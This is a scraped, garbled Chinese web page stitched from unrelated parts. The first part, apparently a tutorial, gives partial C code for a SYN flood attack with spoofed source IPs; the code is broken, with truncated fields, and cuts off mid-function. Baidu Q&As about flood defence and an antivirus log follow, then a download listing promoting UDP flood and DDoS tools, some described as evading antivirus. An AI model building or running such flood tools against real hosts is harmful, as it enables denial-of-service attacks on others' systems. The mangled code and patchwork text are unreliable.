天极传媒：天极网全国分站
您现在的位置：
& &&洪水攻击原理及代码实现全攻略(附源代码)
洪水攻击原理及代码实现全攻略(附源代码)天极开发 13:49
　　三、 洪水攻击的实现　　在上一部分我们讨论了洪水攻击原理，在这一部分我将给出一个完成的实例说明如何使用语言来设计洪水攻击程序。　　由于ICMP报文是用IP协议发送的，因此，我们需要自己定义IP数据包的数据结构，这样我们就可以任意修改IP数据包的内容了。下面是IP协议的数据结构。
typedef struct _iphdr //定义IP首部 { 　unsigned char h_ //4位首部长度,4位IP版本号 　 //8位服务类型TOS 　unsigned short total_ //16位总长度（字节） 　 //16位标识 　unsigned short frag_and_ //3位标志位 　 //8位生存时间 TTL 　 //8位协议 (TCP, UDP 或其他) 　uns //16位IP首部校验和 　unsigned int sourceIP; //32位源IP地址 　unsigned int destIP; //32位目的IP地址 } IP_HEADER;　　这个结构比较复杂，我们只看其中3个，其余的成员可以参考《详解 卷1：协议》的相关部分。最后两个成员sourceIP和destIP就是上述所说的A和B的IP。而最重要的就是checksum，这个参数是一个验证码，用于验证发送的IP数据包的正确性，我们把这个验证码称为校验和。计算它的函数如下：
USHORT checksum(USHORT *buffer, int size) { 　unsigned long cksum=0; 　while(size &1) 　{ 　　cksum+=*buffer++; 　　size -=sizeof(USHORT); 　} 　if(size ) 　{ 　　cksum += *(UCHAR*) 　} 　cksum = (cksum && 16) + (cksum & 0xffff); 　cksum += (cksum &&16); 　return (USHORT)(~cksum); }　　看了上面的代码也许会有很多疑问，下面我就简单描述一下如何计算机IP数据包的校验和。IP数据包的校验和是根据IP首部计算机出来的，而并不对IP数据包中的数据部分进行计算。为了计算一个数作为校验和，首先把校验和字段赋为0。然后，对首部中每个16位进行二进制白马反码求和（我们可以将整个IP首部看成是由一组16位的字组成），将结果保存在校验和字段中。当收到一份IP数据报后，同样对首部中每个16位进行二进制反码的求和。由于接收方在计算机过程中包含了发送方存在首部的校验和，因此，如果首部在传输过程中没有发生任何差错，那么接收方计算的结果应该全是1.如果结果不全是1（即校验和错误），那么IP就丢弃收到的数据报。但不生成差错报文，由上层（如TCP协议）去发现丢失的数据报并进行重传。　　由于我们要发送假的TCP连接包，因此，为分别定义一个伪TCP首部和真正的TCP首部。
struct //定义TCP伪首部 { 　 //源地址 　 //目的地址 　 　 //协议类型 　 //TCP长度 } psd_ typedef struct _tcphdr //定义TCP首部 { 　USHORT th_ //16位源端口 　USHORT th_ //16位目的端口 　unsigned int th_ //32位序列号 　unsigned int th_ //32位确认号 　unsigned char th_//4位首部长度/6位保留字 　unsigned char th_//6位标志位 　USHORT th_ //16位窗口大小 　USHORT th_ //16位校验和 　USHORT th_ //16位紧急数据偏移量 } TCP_HEADER;　　在以上的准备工作都完成后，就可以写main函数中的内容了。下面是程序的定义部分。
#include &winsock2.h& #include &Ws2tcpip.h& #include &stdio.h& #include &stdlib.h& #define SEQ 0x #define SYN_DEST_IP "127.0.0.1"//被攻击的默认IP #define FAKE_IP "10.168.150.1" //伪装IP的起始值，可以是任意IP #define STATUS_FAILED 0xFFFF//错误返回值int main(int argc, char **argv) { 　int datasize,ErrorCode,counter,flag,FakeIpNet,FakeIpH 　int TimeOut=2000,SendSEQ=0; 　char SendBuf[128]; // 每个数据包是128个字节　char DestIP[16]; // 要攻击的机器IP，在这里就是B的IP　memset(DestIP, 0, 4); 　// 如果通过参数输入个IP，将DestIP赋为这IP，否则SYN_DEST_IP赋给DestIP　if(argc & 2) 　　strcpy(DestIP, SYN_DEST_IP);　else　　strcpy(DestIP, argv[1]);　　// 以下是声明Socket变量和相应的数据结构　WSADATA wsaD 　SOCKET SockRaw=(SOCKET)NULL; 　struct sockaddr_in DestA 　IP_HEADER ip_ 　TCP_HEADER tcp_　… …}
2分页导航1.2.洪水攻击的实现3.
（作者：极地圣火责任编辑：方舟）
欢迎在新浪微博上关注我们
办公软件IT新闻整机有什么防止洪水攻击的方法~~~_百度知道
有什么防止洪水攻击的方法~~~
一直处于被动防御！，竞争太激励我在的网吧！，地方不是很好！想请教一下有什么好方法可以防止被攻击，从开业一直受到现在经常受到洪水攻击！，网吧有点多
提问者采纳
Linux引进了“网络守护进程服务程序”的概念，以保持多个子服务器池等待下一个客户端请求，xinetd模式也称Internet Super－Server（超级服务器）。
和stand－alone工作模式相比、uucp
小提示，系统不想要每一个网络服务进程都监听其服务端口：rquotad，保护了系统资源：telnet。 工作在stand-alone模式下的网络服务有S模式的访问模式：
标准互联网服务。例如、rstatd。大家比较熟悉的Web服务器是Apache和邮件服务器Sendmail。如果客户端产生一个连接请求。和stand－alone模式相比、echo、walld
BSD服务。为了解决这个问题，而主服务器继续监听：name，反而会导致系统性能下降。
在Linux系统中通过stand-alone工作模式启动的服务由&#47。xinetd能够同时监听多个指定的端口、下面对应的运行级别当中的符号链接启动.0使用的网络守护进程是xinetd（eXtended InterNET daemon）、ftp
信息服务;etc&#47，可以看到两种不同方式启动的网络服务，在Linux命令行下使用pstree命令，而其他服务类型都可以使用xinetd超级服务器管理、systat
RPC服务;rc，这样就降低了系统开销，守护进程就创建（Fork）一个子服务器响应这个连接，但是您需要硬件档次非常高的服务器。在Apache这种负载很大的服务器上.xinetd模式
从守护进程的概念可以看出、经常出现并发访问时，对于系统所要通过的每一种服务都必须运行一个监听某个端口连接所发生的守护进程，启动不同的网络服务进程来处理这些用户请求、ntalk。
针对xinetd模式的DoS防范
xinetd提供类似于inetd+tcp_wrapper的功能，这通常意味着资源浪费、services time
安全服务：irc
其他服务、sendmail也可以使用xinetd模式启动。
Redhat Linux 9，预先创子服务器可以提高客户的服务速度，然后启动相应的守护进程、gated：comsat、netstat、talk
内部服务，它决定把一个客户请求交给哪个程序处理，运行单个xinetd就可以同时监听所有服务端口、sprayd。但是对于访问量大.限制同时运行的进程数
通过设置instances选项设定同时运行的并发进程数.d&#47、tftp、daytime。
察看系统为Linux服务提供哪种模式方法。一般来说系统一些负载高的服务，在接受用户请求时能根据用户请求端口的不同、Apache服务是单独启动的、login,系统默认使用xinetd的服务可以分为如下几类、shell.stand-alone模式
stand-alone方式是Unix传统的C&#47，xinetd想要频繁启动对应的网络服务进程：chargen、servers。我们可以把xinetd看成一个管理启动服务的管理服务器：finger，能有效防止DoS：
instances＝20
说明。服务器监听（Listen）在一个特点的端口上等待客户端的联机，xinetd将停止接受多出部分的连接请求、exec。
2：从原理上Apache：当服务器被请求连接的进程数达到20个时，如Sendmail，但是更加强大和安全这是网站里面其中一个办法 防范对Linux的DoS攻击几种方法 Linux服务器的两种守护进程
其他类似问题
为您推荐：
洪水攻击的相关知识
其他1条回答
txwm.txwm.asp?BoardID=190&ID=746237" target="_blank">//printpage://bbs.asp://bbs<a href="http
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁麻烦帮我看看得是电脑中病毒了，装上小红伞后今天一直有icmp洪水攻击_百度知道
麻烦帮我看看得是电脑中病毒了，装上小红伞后今天一直有icmp洪水攻击
360Downloads&#92; ProgramFilesDir&#47.dll
无法写入文件。C.VC90;UUPmsvcp90;”
未发现病毒!
此文件是一个 Windows 系统文件;Microsoft:开始在“C!开始扫描可执行文件(注册表)!扫描结束时间.exe。
无法打开此文件以进行扫描;pagefile。注册表已扫描(64 个文件)!
--& ProgramFilesDir&#47!
此文件是一个 Windows 系统文件!
--&gt:&#92;UUSee_tv_Setup_0; 中扫描C.CRT;videoAccDEN ProgramFilesDir&#47;”&lt.sys
无法打开文件。正在启动文件扫描; ProgramFilesDir&#47:启动扇区“C;Preload&gt!
--&gt:&#92: 38.dll
无法写入文件!
--& ProgramFilesDir&#47.dll
无法写入文件.P2P
[0] 存档类型。
无法打开此文件以进行扫描: NSIS
--&gt:&#92。C:&#92.sys
无法打开文件:21已用时间.dll
无法写入文件;download!
20:&#92.manifest
无法写入文件启动主启动扇区扫描; ProgramFilesDir&#47:主启动扇区 HD0
未发现病毒.exe
无法写入文件!开始扫描启动扇区
提问者采纳
用360吧小红伞有些病毒杀不掉的以前我用小红伞也经常这样
其他类似问题
为您推荐：
其他2条回答
有些文件是系统文件，无法注入很正常的，不用担心，你用360杀毒看看吧
小红伞误报有点严重啊··
小红伞的相关知识
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁udpfloodAttack UDP洪水攻击程序源码.威力很大.不要拿它来作坏噢 WinSock-NDIS 网络编程 247万源代码下载-
&文件名称: udpfloodAttack& & [
& & & & &&]
&&所属分类:
&&开发工具: Visual C++
&&文件大小: 4 KB
&&上传时间:
&&下载次数: 15
&&提 供 者:
&详细说明：UDP洪水攻击程序源码.威力很大.不要拿它来作坏噢-UDP Flood attack procedure source. Powerful. Not bad for the staff to Oh
文件列表(点击判断是否您需要的文件，如果是垃圾请在下面评价投诉):
&&udpflood&&........\udp.vbw&&........\MAIN.FRM&&........\udp.vbp&&........\VB UDPFlood.txt&&黑白网络.txt&&sdf.txt
&[]:纯粹是垃圾
&近期下载过的用户:
&相关搜索:
&输入关键字，在本站247万海量源码库中尽情搜索：
&[] - 风云压力测试是一款ddos攻击软件，可同时攻击多个目标,木马过全免杀,后台验证软件,效果超强。攻击类型：TCP、UDP、ICMP、HTTP Get flood。可同时进行控制与攻击。
&[] - UDP-FLOOD洪水攻击工具，C语言开发，已经经过测试，攻击速度极快，每秒钟达到几千甚至上万个包，可以达到一般电脑的硬件极限
&[] - 洪水攻击器源代码，做为学习使用，欢迎大家多多交流心得，欢迎大家多多下载
&[] - 进行DoS攻击的高效工具
&[] - UDP洪水攻击工程文件,UDP洪水攻击工程文件
&[] - UDP洪水攻击器。用于UDP端口攻击。与DDOS相仿。小红伞防火墙报告有洪水攻击，为什么是有病毒吗_百度知道
小红伞防火墙报告有洪水攻击，为什么是有病毒吗
jpg" target="_blank" title="点击查看大图" class="ikqb_img_alink"><img class="ikqb_img" src="http://b.baidu.hiphotos://b.com/zhidao/wh%3D600%2C800/sign=d688a357baa294fc6a7efce1b7ca2deb58f65db./zhidao/pic//zhidao/wh%3D450%2C600/sign=d1ed21b799c26e/91ef76c6a7efce1b7ca2deb58f65db<a href="http.jpg" esrc="http.hiphotos://b.baidu
提问者采纳
报可能性更大。防火墙不是监控病毒的，一般都会有这个提示，关掉它的提示就清净了，而且这个洪水不算是病毒。我用迅雷下载东西
提问者评价
其他类似问题
为您推荐：
小红伞的相关知识
其他3条回答
防水墙——酷——%&_&%
应该是误报，瞬间数据流量比超过防火墙的设定值的时候，防火墙会误报FLOOd攻击。
红伞的有点水，你可以重装下，建议用comodo
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁